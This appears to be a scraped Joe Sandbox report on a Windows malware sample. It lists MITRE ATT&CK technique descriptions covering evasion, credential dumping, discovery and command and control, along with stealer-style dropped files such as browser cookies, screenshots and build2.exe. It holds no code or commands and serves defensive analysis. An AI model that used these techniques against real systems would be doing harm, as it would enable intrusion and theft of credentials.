Description:	Adversaries may exploit software vulnerabilities in an attempt to collect elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Application logs, Process monitoring, Windows Error Reporting
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Q5W0I0pzFI

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\CP8Z9ZN3KMVU03RJRFJ\d06ed635-68f6-4e9a-955c-4899f5f57b9a3303128020.zip

C:\ProgramData\CP8Z9ZN3KMVU03RJRFJ\files\Cookies\Google Chrome_Default.txt

C:\ProgramData\CP8Z9ZN3KMVU03RJRFJ\files\Files\DESKTOP.zip

C:\ProgramData\CP8Z9ZN3KMVU03RJRFJ\files\information.txt

C:\ProgramData\CP8Z9ZN3KMVU03RJRFJ\files\screenshot.jpg

C:\ProgramData\CP8Z9ZN3KMVU03RJRFJ\files\temp

C:\ProgramData\freebl3.dll

C:\ProgramData\mozglue.dll

C:\ProgramData\msvcp140.dll

C:\ProgramData\nss3.dll

C:\ProgramData\softokn3.dll

C:\ProgramData\vcruntime140.dll

C:\SystemID\PersonalID.txt

C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe

Windows Analysis Report
Q5W0I0pzFI

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre